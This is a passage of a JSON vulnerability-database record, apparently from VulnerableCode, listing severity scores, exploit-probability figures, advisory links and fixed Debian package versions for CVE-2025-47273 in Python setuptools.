"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47273.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-47273", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65523", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65503", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65533", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.654", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65364", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65489", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65444", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65464", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65467", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65455", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65438", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65453", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65442", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65417", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65428", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65374", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65405", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65433", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00487", "scoring_system": "epss", "scoring_elements": "0.65447", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-47273" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47273", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47273" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml" }, { "reference_url": "https://github.com/pypa/setuptools", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/setuptools" }, { "reference_url": "https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/" } ], "url": "https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88" }, { "reference_url": "https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/" } ], "url": "https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b" }, { "reference_url": "https://github.com/pypa/setuptools/issues/4946", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/" } ], "url": "https://github.com/pypa/setuptools/issues/4946" }, { "reference_url": "https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/" } ], "url": "https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47273", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47273" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105970", "reference_id": "1105970", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105970" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366982", "reference_id": "2366982", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366982" }, { "reference_url": "https://github.com/advisories/GHSA-5rjg-fvgr-3xxf", "reference_id": "GHSA-5rjg-fvgr-3xxf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5rjg-fvgr-3xxf" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10407", "reference_id": "RHSA-2025:10407", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10407" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10787", "reference_id": "RHSA-2025:10787", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10787" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10809", "reference_id": "RHSA-2025:10809", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10809" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10992", "reference_id": "RHSA-2025:10992", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10992" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11036", "reference_id": "RHSA-2025:11036", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11036" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11043", "reference_id": "RHSA-2025:11043", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11043" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11044", "reference_id": "RHSA-2025:11044", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11044" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11101", "reference_id": "RHSA-2025:11101", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11101" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11102", "reference_id": "RHSA-2025:11102", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11102" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11146", "reference_id": "RHSA-2025:11146", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11146" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11388", "reference_id": "RHSA-2025:11388", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11388" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11424", "reference_id": "RHSA-2025:11424", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11424" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11425", "reference_id": "RHSA-2025:11425", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11425" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11426", "reference_id": "RHSA-2025:11426", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11426" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11427", "reference_id": "RHSA-2025:11427", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11427" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11463", "reference_id": "RHSA-2025:11463", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11463" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11464", "reference_id": "RHSA-2025:11464", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11464" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11584", "reference_id": "RHSA-2025:11584", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11584" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11607", "reference_id": "RHSA-2025:11607", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11607" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11868", "reference_id": "RHSA-2025:11868", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11868" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:11984", "reference_id": "RHSA-2025:11984", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:11984" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:12020", "reference_id": "RHSA-2025:12020", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:12020" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:12834", "reference_id": "RHSA-2025:12834", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:12834" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:13578", "reference_id": "RHSA-2025:13578", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:13578" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:13668", "reference_id": "RHSA-2025:13668", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:13668" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:13669", "reference_id": "RHSA-2025:13669", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:13669" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:13803", "reference_id": "RHSA-2025:13803", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:13803" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:13804", "reference_id": "RHSA-2025:13804", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:13804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:14686", "reference_id": "RHSA-2025:14686", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:14686" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:14900", "reference_id": "RHSA-2025:14900", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:14900" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:15408", "reference_id": "RHSA-2025:15408", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:15408" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:15410", "reference_id": "RHSA-2025:15410", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:15410" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:15411", "reference_id": "RHSA-2025:15411", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:15411" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19421", "reference_id": "RHSA-2025:19421", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19421" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19422", "reference_id": "RHSA-2025:19422", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19422" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19423", "reference_id": "RHSA-2025:19423", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19423" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19424", "reference_id": "RHSA-2025:19424", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19424" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19425", "reference_id": "RHSA-2025:19425", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19425" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19426", "reference_id": "RHSA-2025:19426", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19426" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19427", "reference_id": "RHSA-2025:19427", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19427" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19428", "reference_id": "RHSA-2025:19428", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19428" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19429", "reference_id": "RHSA-2025:19429", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19429" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19430", "reference_id": "RHSA-2025:19430", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19430" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:9940", "reference_id": "RHSA-2025:9940", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:9940" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:9966", "reference_id": "RHSA-2025:9966", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:9966" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4215", "reference_id": "RHSA-2026:4215", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4215" }, { "reference_url": "https://usn.ubuntu.com/7544-1/", "reference_id": "USN-7544-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7544-1/" }, { "reference_url": "https://usn.ubuntu.com/8010-1/", "reference_id": "USN-8010-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8010-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/939277?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939282?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939275?format=api", "purl": "pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939279?format=api", "purl": "pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-v6y5-h7b6-3qda" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie" } ], "aliases": [ "BIT-setuptools-2025-47273", "CVE-2025-47273", "ECHO-2d75-a206-3684", "GHSA-5rjg-fvgr-3xxf", "PYSEC-2025-49" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uqed-9p12-7bdx" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie" }